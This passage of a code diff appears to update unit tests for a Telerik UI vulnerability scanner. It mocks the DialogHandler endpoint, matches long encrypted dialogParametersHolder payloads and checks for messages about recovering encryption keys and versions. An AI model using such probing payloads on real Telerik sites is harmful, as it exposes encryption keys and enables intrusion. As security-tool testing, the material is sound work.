B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + request.body + == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRGPI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" ): return True return False @@ -132,9 +131,9 @@ def PBKDF2_version_probe_matcher_incorrect(request): if ( request.body != "dialogParametersHolder=AAAA" and request.body - != "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2FwadcvpFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + != "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRGPI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" and request.body - != "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + != "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return True return False @@ -290,7 +289,8 @@ def generate_keylist_hash(include_machinekeys): m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF2_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( @@ -301,13 +301,13 @@ def generate_keylist_hash(include_machinekeys): captured = capsys.readouterr() print(captured.out) assert "Target is a newer version of Telerik UI" in captured.out - assert "Found Encryption key!" in captured.out - assert "Found matching hashkey!" in captured.out + assert "Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert "SUCCESS! Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert ("SUCCESS! Found working version: 2018.1.117") in captured.out assert ( - "%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2FwadcvpFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + "%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRG